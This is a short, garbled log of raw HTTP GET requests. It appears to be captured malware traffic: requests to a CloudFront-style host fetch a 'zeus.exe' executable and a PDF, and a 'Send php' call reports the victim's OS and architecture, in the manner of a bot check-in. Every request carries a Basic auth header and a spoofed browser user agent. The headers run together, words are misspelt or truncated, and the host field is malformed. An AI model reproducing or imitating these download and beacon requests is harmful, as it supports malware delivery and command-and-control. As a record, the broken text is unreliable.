GET /Yabrod.pdf HTTP/1.1Authoration: Basic enNjYWxlcjp6c2NhbGVYUser-Agent:" 
Mozilla/5.0(WindowsNT 6.3; WOW64; Trident/7.0;TNJB rv:11) like GeckHost: d1stb3hi9@gown.cloudfront.net

GET /Send php?admin=34&d=1234$nat=no&os=win&videompg&arch_type HTTP/1.1Authoration: Basic enNjYWxlcjp6c2NhbGVYUser-Agent:" 
Mozilla/5.0(Windows10 6.3; WOW64; Trident/7.0;TNJB rv:11) like GeckHost: d1stb3hi9@gown.cloudfront.net

GET /Yabrod.pdf HTTP/1.1Authoration: Basic enNjYWxlcjp6c2NhbGVYUser-Agent:" 
Mozilla/5.0(WindowsNT 6.3; WOW64; Trident/7.0;TNJB rv:11) like GeckHost: d1stb3hi9@gown.cloudfront.net

GET /zeus.exe HTTP/1.1Authoration: Basic enNjYWxlcjp6c2NhbGVYUser-Agent:" 
Mozilla/5.0(WindowsNT 6.3; WOW64; Trident/7.0;TNJB rv:11) like GeckHost: d1stb3hi9@gown.cloudfront.net
